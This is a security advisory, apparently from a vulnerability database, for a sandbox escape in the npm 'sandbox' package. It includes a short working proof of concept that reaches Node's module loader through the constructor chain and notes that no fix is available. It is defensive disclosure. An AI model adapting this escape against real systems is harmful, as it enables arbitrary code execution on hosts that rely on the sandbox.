Sandbox Breakout / Arbitrary Code Execution in sandbox

All versions of sandbox are vulnerable to Sandbox Escape leading to Remote Code Execution. Due to insufficient input sanitization it is possible to escape the sandbox using constructors.

Proof of concept

var Sandbox = require(&quot;sandbox&quot;)
s = new Sandbox()
code = `new Function(&quot;return (this.constructor.constructor(&#039;return (this.process.mainModule.constructor._load)&#039;)())&quot;)()(&quot;util&quot;).inspect(&quot;hi&quot;)`
s.run(code)

Recommendation

No fix is currently available. Consider using an alternative module until a fix is made available.

Published: Sep 2, 2020
Updated: Apr 14, 2023
GHSA: GHSA-fm4j-4xhm-xpwx
Severity: Medium
Exploit:

No technical information available.

No CWE or OWASP classifications available.

Affected Software
References

Software	From	Fixed in
sandbox	0.0.0	-

https://github.com/gf3/sandbox/issues/50
https://www.npmjs.com/advisories/766

Vulnerability Database

Sandbox Breakout / Arbitrary Code Execution in sandbox

Proof of concept

Recommendation

Deep Security Visibility Without the Complexity